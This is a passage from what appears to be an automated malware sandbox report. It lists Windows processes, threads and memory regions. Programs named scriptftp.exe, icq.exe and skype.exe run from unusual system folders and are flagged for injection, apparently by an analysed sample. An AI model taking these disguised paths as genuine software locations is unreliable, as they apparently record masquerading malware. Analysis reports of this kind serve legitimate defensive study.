end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3653 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3654 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3655 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3656 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3657 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3658 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 187 os_tid = 0x10d0 Thread: id = 188 os_tid = 0x1098 Process: id = "33" image_name = "scriptftp.exe" filename = "c:\\program files (x86)\\microsoft.net\\scriptftp.exe" page_root = "0x1ef80000" os_pid = "0x1174" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\scriptftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4907 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4908 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4909 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4910 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4911 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4912 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4913 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4914 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4915 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4916 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4917 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4918 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4919 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4920 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 4921 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4922 start_va = 0x7e0000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 4923 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 4924 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 4925 start_va = 0xba0000 end_va = 0xc5bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 4926 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 4927 start_va = 0xdd0000 end_va = 0xde6fff monitored = 0 entry_point = 0xdd14a1 region_type = mapped_file name = "scriptftp.exe" filename = "\\Program Files (x86)\\Microsoft.NET\\scriptftp.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\scriptftp.exe") Region: id = 4928 start_va = 0xdf0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 4929 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4930 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4931 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4932 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4933 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4934 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4935 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4936 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4937 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4938 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4939 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4940 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4941 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4942 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4943 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4944 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4945 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4946 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4947 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4948 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4949 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4950 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4951 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4952 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4953 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4954 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 189 os_tid = 0x1224 Thread: id = 190 os_tid = 0x1178 Process: id = "34" image_name = "icq.exe" filename = "c:\\program files\\windowspowershell\\icq.exe" page_root = "0x69e98000" os_pid = "0x1194" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\WindowsPowerShell\\icq.exe\" " cur_dir = "C:\\Program Files\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4811 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4812 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4813 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4814 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4815 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4816 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4817 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4818 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4819 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4820 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4821 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4822 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4823 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4824 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4825 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 4826 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 4827 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 4828 start_va = 0x980000 end_va = 0xa3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 4829 start_va = 0xa90000 end_va = 0xaa6fff monitored = 0 entry_point = 0xa914a1 region_type = mapped_file name = "icq.exe" filename = "\\Program Files\\WindowsPowerShell\\icq.exe" (normalized: "c:\\program files\\windowspowershell\\icq.exe") Region: id = 4830 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 4831 start_va = 0xc40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 4832 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 4833 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4834 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4835 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4836 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4837 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4838 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4839 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4840 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4841 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4842 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4843 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4844 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4845 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4846 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4847 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4848 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4849 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4850 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4851 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4852 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4853 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4854 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4855 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4856 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4857 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4858 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 191 os_tid = 0x121c Thread: id = 192 os_tid = 0x1198 Process: id = "35" image_name = "skype.exe" filename = "c:\\program files\\windows nt\\skype.exe" page_root = "0x15192000" os_pid = "0x118c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows NT\\skype.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4859 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4860 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4861 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4862 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4863 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4864 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 4865 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4866 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4867 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4868 start_va = 0xe0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4869 start_va = 0xf0000 end_va = 0x106fff monitored = 0 entry_point = 0xf14a1 region_type = mapped_file name = "skype.exe" filename = "\\Program Files\\Windows NT\\skype.exe" (normalized: "c:\\program files\\windows nt\\skype.exe") Region: id = 4870 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4871 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4872 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4873 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4874 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4875 start_va = 0x6a0000 end_va = 0x75bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 4876 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 4877 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4878 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 4879 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 4880 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 4881 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4882 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4883 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4884 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4885 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4886 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4887 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4888 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4889 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4890 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = 